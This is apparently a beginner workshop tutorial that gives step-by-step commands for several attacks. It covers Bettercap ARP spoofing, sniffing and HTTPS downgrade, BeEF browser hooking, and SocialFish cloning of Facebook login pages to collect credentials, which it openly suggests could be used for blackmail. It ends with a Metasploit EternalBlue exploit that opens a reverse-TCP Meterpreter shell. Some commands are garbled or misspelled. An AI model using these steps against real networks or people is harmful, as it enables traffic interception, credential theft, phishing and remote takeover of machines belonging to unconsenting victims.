This is a beginner workshop tutorial on network hacking tools such as BeEF, Social Fish and Bettercap.
https://www.facebook.com/makesmartthings/videos/686763711857192/
Copy the entire link, instead of clicking on the hyperlink.
https://drive.google.com/open?id=1t2LhMz6TcZ1ne5fXdH1WG3NwOr57WIb_
Kali Linux image: https://images.offensive-security.com/virtual-images/kali-linux-2019.4-vbox-amd64.ova
Installation instructions for Windows: https://www.youtube.com/watch?v=XlJ7FsI0wj4
Installation instructions for Mac: https://www.youtube.com/watch?v=J7VFSrye8u0
Windows 7 image -https://softlay.net/operating-system/windows-7-ultimate-iso-download.html
Installation instructions for Windows: https://www.youtube.com/watch?v=cpRTGtCmZUs
Installation instructions for Mac:https://www.youtube.com/watch?v=HAKJdqYEEmY
Bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energydevices, wireless HID devices and Ethernet networks.
Power ON the Machine
Okay, to start working, we need to first search and click for “VirtualBox” then select the engine and click start at the top. This way we have everything set up to start working with Kali Linux with Default username: root and pass: toor
- Click on the Terminal
- Install bettercap
apt install bettercap
- Update the repositories
apt-get update
- Type “bettercap” and “help” to show all the commands available to use this tool.
- To see the clients that are connected to the same network
net.probe on
- To show all the devices connected to your network
net.show
- To begin the process of spoofing an IP Address
help arp.spoof
-
Now we proxy the connection as we want the victim to know we are the gateway but we don’t want the gateway to know we are targeting it so that we can get responses.
set arp.spoof.fullduplex true -
To select the victim’s ip address which we want to target , just fill the “bla” spaces with numbers.
set arp.spoof.targets bla.bla.bla.bla
- To start the spoof attack
arp.spoof on
-
To capture the victim’s data aka “sniffing”
net.sniff on -
Now we use WireShark which is a tool that captures the victim’s information and decodes into a file that is easy to read by the user so to Run the program, all you need to do is type “wireshark” on another new terminal.
-
Now to release the attack on the wanted interface , select “etho” and observe the traffic, choose a site and stop the traffic then write “http” on the filter.
-
Now is Testing Time!!! So all you need to do is go to any “http” Website and not “https” and then you can enter some data and check the “POST” Packets to see how your data has been sniffed and sent to the hacker.
-
So now after learning how to use it on http. We will learn how to downgrade any website such as “https” and “hsts” to “http”. We begin by going to the below directory and deleting the file named “hstshihack”
/usr/share/bettercap/caplets -
Now we download the new file by cloning the github repository of the “hstshijack” tool.
git clone https://github.com/The-Assembly/Intro-to-Ethical-Hacking/blob/master/hstshijack/
-
Then, we go to the downloads file and cut the file named “hstshijack” and paste it in place of the previous file following this path
/usr/share/bettercap/caplets -
Lastly, to use the tool, we have to type in the terminal and follow the above stepsstarting from no.3 to perform the attack.
hstshijack/hstshijack
BeEF is a penetration testing tool that focuses on web browsers vulnerabilities to be able to secure web browsers against malicious attacks.
-
First, we have to update the repositories to make sure that we start fresh
apt-get update -
We install the tool
apt install beef.xss -
We initialize the tool by typing “beef-xss”
-
Then you are asked to type a password.Enter any password that you choose. However, make sure you remember this password as you will need it later for a following step.
-
Look for the “script” tag and copy it.
-
To perform our attack, you need inject the code line into the website by pasting it to apache server so you have to navigate the wanted folder by going to “home” and write the following piece
/var/www/html/index.html
-
Paste the script line in the above file and then spot the IP Address at the bottom of the file and fill in you own device ip address.
-
Go to the browser and add a zero to the ip address at the top as such “172.0.0.1”. You’ll be directed to a login page so just enter “beef” as username and the password you have set before.
-
Now, we have to run the Apache Server by typing the following commands
apt apache2 installservice apache2 start -
Then, we have to hook a server file so we go to the browser and paste the ip address of the victim which in this case is our ip address that we got from the -ipconfig- command. You should be redirected then to a page with a msg that says that your hooked.
-
Next, we should have a connection on some networks under online browsers. So under online browsers, after clicking on the wanted network address, you’ll find a list of commands and ways to play with and execute attacks on the victim such as “Alert Dialogue” option. This will display the directed message on the victim’s device.
-
There are many other commands that could performed such as Pretty theft and Google Phishing which creates a fake page exactly like google to record your activities.
This is a tool that is used to create a duplicate of a popular site like Facebook,Instagram,Twitter..etc so that the hacker could trick the victim into thinking this is the real page and have them login with their data and then be able to manipulate the data and perhaps blackmail them with it.
- To begin with , we have to install the tool by cloning its github repository
git clone https://github.com/UndeadSec/SocialFish
- We navigate to the folder we just cloned by typing “dir” then
cd SocialFish/
- Because this tool is python scripted, we will have to apply the following commands
apt-get install python3 python3-pip python3-dev -y
python -m pip install -r requirements.txt
- Now, we initialize the service
python3 SocialFish.py root pass
-
Then, you go to the top under the Social Fish logo, you’ll notice a line that says “Go to http://0.0.0.0:5000/neptune to start”. So you paste the ip address into your browser.
-
You will be redirected to a login page where you can enter “root” for username and “pass” for password
-
Now, you could write the name of the website you want to clone and the one to be redirected to. For example:
-
Now if you copy the ip address “0.0.0.0:5000/Neptune” You’ll be redirected to the cloned page which in this case is facebook. This is a fake page based on facebook design and everything that you enter gets copied and sent to the hacker. So to test it, just enter any garbage text and submit.
-
You can check your entries or responses got from the fake site we cloned by going down on the original page and clicking “View” to see whatever username and pass were entered.
Zenmap is the Nmap security scanner graphical user interface and provides for hundreds of options. It lets users do things like save scans and compare them, view network topology maps, view displays of ports running on a host or all hosts on a network, and store scans in a searchable database
-
Click on the Zenmap icon from the left panel on linux desktop
-
Go to the terminal to get the gateway
gateway route -n -
Then we go to the target tab and enter the gateway found with /24
-
Then we choose “Quick Scan plus” as a profile
-
After waiting for some time, we will be able to see all IP addresses that are connected on that gateway
-
We choose one as our target. In this case, we will choose one with Windows 7
-
Now we don’t know whether this network is vulnerable or not so for that we will be using a tool called “Metasploit” which will be discussed further in the next step.
The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux
- We start by cloning the github repository of the Metasploit tool.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
- Then we go to the root directory and choose the file with “.rb” extension. We copy it and then follow this path
/usr/share/Metasploit-framework/modules/exploits/windows/smb
- We paste the file copied before inside the smb folder.
- Then, we go back to the terminal so that we can run the attack. We do that by first typing
msfconsole - Now, to check whether the device is vulnerable or not we go to terminal and say
use auxiliary/scanner/smb/smb_ms17_010
- Now we
show optionsto see the different things we could do with the tool. - Then, we would want to set the target IP which in this case will be our own device IP. This could be found by typing “ifconfig” on Linux or “ipconfig” on the device cmd and then we type this without the “<<>>”
set RHOSTS <<victim’s ip add>>
- Now we run the attack by simply typing “run”
- Then you’ll see how it would tell you whether this network is vulnerable or not so since ours is we will do this
use exploit/windows/smb/eternalblue_doublepulsar
- Now, we will try gaining access to the target again by
set RHOSTS <<victim’s ip add>>
- Then to target a fast and basic process that runs on every device to inject the attack on
set PROCESSINJECT lssas.exe
set PAYLOAD windows/x64/meterpeter/reverse_tcp
- Now, we set the Local host of which is the hacker’s ip address as it is used to access the network services running on his host.
set LHOST <<your ip address>>
- Last we run the attack by typing “run” followed by “help” and then we follow the presenter to see all different techniques that could be used with this tool.